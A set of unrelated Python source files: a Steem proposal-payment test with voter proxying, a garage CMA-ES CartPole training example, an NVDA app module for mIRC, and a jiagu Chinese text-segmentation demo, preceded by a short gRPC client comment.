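# A minimal client sketch for manual testing. Assumptions not confirmed by
# this file: the generated stub is named `SuggestionStub` (the usual grpc
# codegen convention for a `Suggestion` service), DEFAULT_PORT is a
# "host:port" string, and the request message comes from the matching
# api_pb2 module.
#
#     channel = grpc.insecure_channel(DEFAULT_PORT)
#     stub = api_pb2_grpc.SuggestionStub(channel)
#     reply = stub.GetSuggestions(request)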
|
the-stack_0_19932 | #!/usr/bin/python3
import logging
import sys
import steem_utils.steem_runner
import steem_utils.steem_tools
import test_utils
LOG_LEVEL = logging.INFO
LOG_FORMAT = "%(asctime)-15s - %(name)s - %(levelname)s - %(message)s"
MAIN_LOG_PATH = "./sps_proposal_payment_008.log"
MODULE_NAME = "SPS-Tester-via-steempy"
logger = logging.getLogger(MODULE_NAME)
logger.setLevel(LOG_LEVEL)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(LOG_LEVEL)
ch.setFormatter(logging.Formatter(LOG_FORMAT))
fh = logging.FileHandler(MAIN_LOG_PATH)
fh.setLevel(LOG_LEVEL)
fh.setFormatter(logging.Formatter(LOG_FORMAT))
if not logger.hasHandlers():
logger.addHandler(ch)
logger.addHandler(fh)
try:
from steem import Steem
except Exception as ex:
logger.error("SteemPy library is not installed.")
sys.exit(1)
# Voter proxy test
# 1. create few proposals - in this scenario proposals have the same starting and ending dates
# 2. vote on them to show differences in asset distribution, one voter sets the other as the proxy
# 3. wait for proposal payment phase
# 4. verify (using account history and by checking regular account balance) that given accounts have been correctly paid.
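# Expected outcome, sketched from the assertions below: tester001 votes while
# proxied, so its vote carries no weight and its own proposal is never funded --
# tester001 ends where it started (390.000 TBD). The other proposals each
# collect roughly 24.000 TBD per payout day (~96 TBD over the run, minus
# per-hour rounding, hence the 485.808 TBD figures asserted at the end).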
def vote_proposals(node, accounts):
logger.info("Voting proposals...")
idx = 0
for acnt in accounts:
proposal_set = [idx]
logger.info("Account {} voted for proposals: {}".format(acnt["name"], ",".join(str(x) for x in proposal_set)))
node.commit.update_proposal_votes(acnt["name"], proposal_set, True)
idx += 1
steem_utils.steem_tools.wait_for_blocks_produced(5, node.url)
if __name__ == '__main__':
logger.info("Performing SPS tests")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("creator", help = "Account to create test accounts with")
parser.add_argument("treasury", help = "Treasury account")
parser.add_argument("wif", help="Private key for creator account")
parser.add_argument("--node-url", dest="node_url", default="http://127.0.0.1:8090", help="Url of working steem node")
parser.add_argument("--run-steemd", dest="steemd_path", help = "Path to steemd executable. Warning: using this option will erase contents of selected steemd working directory.")
parser.add_argument("--working_dir", dest="steemd_working_dir", default="/tmp/steemd-data/", help = "Path to steemd working directory")
parser.add_argument("--config_path", dest="steemd_config_path", default="./steem_utils/resources/config.ini.in",help = "Path to source config.ini file")
parser.add_argument("--no-erase-proposal", action='store_false', dest = "no_erase_proposal", help = "Do not erase proposal created with this test")
args = parser.parse_args()
node = None
if args.steemd_path:
logger.info("Running steemd via {} in {} with config {}".format(args.steemd_path,
args.steemd_working_dir,
args.steemd_config_path)
)
node = steem_utils.steem_runner.SteemNode(
args.steemd_path,
args.steemd_working_dir,
args.steemd_config_path
)
node_url = args.node_url
wif = args.wif
if len(wif) == 0:
logger.error("Private-key is not set in config.ini")
sys.exit(1)
logger.info("Using node at: {}".format(node_url))
logger.info("Using private-key: {}".format(wif))
accounts = [
        # place accounts here in the format: {'name' : name, 'private_key' : private_key, 'public_key' : public_key}
]
if not accounts:
logger.error("Accounts array is empty, please add accounts in a form {\"name\" : name, \"private_key\" : private_key, \"public_key\" : public_key}")
sys.exit(1)
keys = [wif]
for account in accounts:
keys.append(account["private_key"])
if node is not None:
node.run_steem_node(["--enable-stale-production"])
try:
if node is None or node.is_running():
node_client = Steem(nodes = [node_url], no_broadcast = False,
keys = keys
)
# create accounts
test_utils.create_accounts(node_client, args.creator, accounts)
            # transfer to vesting
test_utils.transfer_to_vesting(node_client, args.creator, accounts, "300.000",
"TESTS"
)
# transfer assets to accounts
test_utils.transfer_assets_to_accounts(node_client, args.creator, accounts,
"400.000", "TESTS"
)
test_utils.transfer_assets_to_accounts(node_client, args.creator, accounts,
"400.000", "TBD"
)
logger.info("Balances for accounts after initial transfer")
test_utils.print_balance(node_client, accounts)
# transfer assets to treasury
test_utils.transfer_assets_to_treasury(node_client, args.creator, args.treasury,
"999950.000", "TESTS"
)
test_utils.transfer_assets_to_treasury(node_client, args.creator, args.treasury,
"999950.000", "TBD"
)
test_utils.print_balance(node_client, [{'name' : args.treasury}])
            # create posts for valid permlinks
test_utils.create_posts(node_client, accounts)
now = node_client.get_dynamic_global_properties().get('time', None)
if now is None:
raise ValueError("Head time is None")
now = test_utils.date_from_iso(now)
proposal_data = [
                ['tester001', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 days
                ['tester002', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 days
                ['tester003', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 days
                ['tester004', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 days
]
proposals = [
                # place proposals here in the format: {'creator' : creator, 'receiver' : receiver, 'start_date' : start_date, 'end_date' : end_date}
]
for pd in proposal_data:
start_date, end_date = test_utils.get_start_and_end_date(now, pd[1], pd[2])
proposal = {'creator' : pd[0], 'receiver' : pd[0], 'start_date' : start_date, 'end_date' : end_date, 'daily_pay' : pd[3]}
proposals.append(proposal)
import datetime
test_start_date = now + datetime.timedelta(days = 1)
test_start_date_iso = test_utils.date_to_iso(test_start_date)
test_mid_date = test_start_date + datetime.timedelta(days = 3, hours = 1)
test_end_date = test_start_date + datetime.timedelta(days = 5, hours = 1)
test_end_date_iso = test_utils.date_to_iso(test_end_date)
test_utils.create_proposals(node_client, proposals)
            # list proposals with inactive status; it should be a list of pairs id:total_votes
test_utils.list_proposals(node_client, test_start_date_iso, "inactive")
# tester01 sets tester02 as its proxy
logger.info("Setting tester002 as a proxy of tester001...")
node_client.commit.account_witness_proxy(proxy='tester002', account='tester001')
# each account is voting on proposal
vote_proposals(node_client, accounts)
            # list proposals with inactive status; it should be a list of pairs id:total_votes
votes = test_utils.list_proposals(node_client, test_start_date_iso, "inactive")
for vote in votes:
                # should be 0 for all
assert vote == 0, "All votes should be equal to 0"
logger.info("Balances for accounts after creating proposals")
test_balances = [
'390.000 TBD',
'390.000 TBD',
'390.000 TBD',
'390.000 TBD',
]
balances = test_utils.print_balance(node_client, accounts)
for idx in range(0, len(test_balances)):
                assert balances[idx] == test_balances[idx], "Balances don't match: {} != {}".format(balances[idx], test_balances[idx])
test_utils.print_balance(node_client, [{'name' : args.treasury}])
            # move forward in time to see if the proposals are paid;
            # time is advanced in one-hour increments, and after each
            # increment the balances are printed
logger.info("Moving to date: {}".format(test_start_date_iso))
node_client.debug_generate_blocks_until(wif, test_start_date_iso, False)
current_date = test_start_date
while current_date < test_end_date:
current_date = current_date + datetime.timedelta(hours = 1)
current_date_iso = test_utils.date_to_iso(current_date)
logger.info("Moving to date: {}".format(current_date_iso))
node_client.debug_generate_blocks_until(wif, current_date_iso, False)
logger.info("Balances for accounts at time: {}".format(current_date_iso))
test_utils.print_balance(node_client, accounts)
test_utils.print_balance(node_client, [{'name' : args.treasury}])
votes = test_utils.list_proposals(node_client, test_start_date_iso, "active")
votes = test_utils.list_proposals(node_client, test_start_date_iso, "expired")
votes = test_utils.list_proposals(node_client, test_start_date_iso, "all")
            # move one additional hour to ensure that all proposals have ended
logger.info("Moving to date: {}".format(test_end_date_iso))
node_client.debug_generate_blocks_until(wif, test_end_date_iso, False)
logger.info("Balances for accounts at time: {}".format(test_end_date_iso))
balances = test_utils.print_balance(node_client, accounts)
            # ideally this would be '390.000 TBD', '486.000 TBD', '486.000 TBD', '486.000 TBD',
            # but because of the rounding implementation it is 390.000 TBD, 485.808 TBD, 485.808 TBD, 485.808 TBD
test_balances = [
'390.000 TBD',
'485.808 TBD',
'485.808 TBD',
'485.808 TBD',
]
for idx in range(0, len(test_balances)):
            assert balances[idx] == test_balances[idx], "Balances don't match: {} != {}".format(balances[idx], test_balances[idx])
test_utils.print_balance(node_client, [{'name' : args.treasury}])
if node is not None:
node.stop_steem_node()
sys.exit(0)
sys.exit(1)
except Exception as ex:
logger.error("Exception: {}".format(ex))
if node is not None:
node.stop_steem_node()
sys.exit(1)
|
the-stack_0_19933 | #!/usr/bin/env python3
"""This is an example to train a task with CMA-ES.
Here it runs CartPole-v1 environment with 100 epoches.
Results:
AverageReturn: 100
RiseTime: epoch 38 (itr 760),
but regression is observed in the course of training.
"""
from garage.experiment import run_experiment
from garage.np.algos import CMAES
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.envs import TfEnv
from garage.tf.experiment import LocalTFRunner
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import OnPolicyVectorizedSampler
def run_task(snapshot_config, *_):
"""Train CMA_ES with Cartpole-v1 environment."""
with LocalTFRunner(snapshot_config=snapshot_config) as runner:
env = TfEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(
name='policy', env_spec=env.spec, hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
n_samples = 20
algo = CMAES(
env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
n_samples=n_samples)
runner.setup(algo, env, sampler_cls=OnPolicyVectorizedSampler)
        # NOTE: make sure that n_epoch_cycles == n_samples! CMA-ES evaluates
        # one sampled policy per cycle, so an epoch must cover the whole
        # population before the search distribution is updated.
runner.train(n_epochs=100, batch_size=1000, n_epoch_cycles=n_samples)
run_experiment(
run_task,
snapshot_mode='last',
seed=1,
)
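# With batch_size=1000 and n_samples=20, each epoch runs 20 cycles of 1000
# environment samples -- one rollout batch per CMA-ES candidate policy --
# before the search distribution is updated.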
|
the-stack_0_19934 | #appModules/mirc.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2010 James Teh <[email protected]>
"""App module for mIRC
"""
import controlTypes
from NVDAObjects.window import Window, DisplayModelLiveText
from NVDAObjects.IAccessible import StaticText
import appModuleHandler
class Input(Window):
def event_gainFocus(self):
super(Input, self).event_gainFocus()
try:
output = self.parent.parent.lastChild.firstChild
except AttributeError:
output = None
if isinstance(output, DisplayModelLiveText):
output.startMonitoring()
self._output = output
else:
self._output = None
    def event_loseFocus(self):
        # _output is only set by event_gainFocus, so guard against losing
        # focus before focus was ever gained.
        if getattr(self, "_output", None):
            self._output.stopMonitoring()
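# mIRC-specific window details: control ID 32918 is the static output pane
# (promoted below to DisplayModelLiveText so newly written text can be
# monitored and reported), and 32921 is the RichEdit input line (promoted
# to the Input overlay above).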
class AppModule(appModuleHandler.AppModule):
def chooseNVDAObjectOverlayClasses(self, obj, clsList):
if obj.role == controlTypes.Role.WINDOW:
return
if obj.windowClassName == "Static" and obj.windowControlID == 32918:
clsList.remove(StaticText)
clsList.insert(0, DisplayModelLiveText)
elif obj.windowClassName == "RichEdit20W" and obj.windowControlID == 32921:
clsList.insert(0, Input)
|
the-stack_0_19936 | import jiagu
# jiagu.init()  # optional manual initialization; otherwise models are loaded lazily on first use
text = '厦门明天会不会下雨'  # "Will it rain in Xiamen tomorrow?"
words = jiagu.seg(text)  # word segmentation
print(words)
words = jiagu.cws(text, model="mmseg")  # segmentation using the mmseg model
print(words)
pos = jiagu.pos(words)  # part-of-speech tagging
print(pos)
ner = jiagu.ner(text)  # named entity recognition
print(ner)
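# Other helpers the toolkit documents upstream -- treat the exact signatures
# as assumptions, since they are not exercised in this file:
# keywords = jiagu.keywords(text, 3)  # keyword extraction
# sentiment = jiagu.sentiment(text)   # sentiment analysis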
|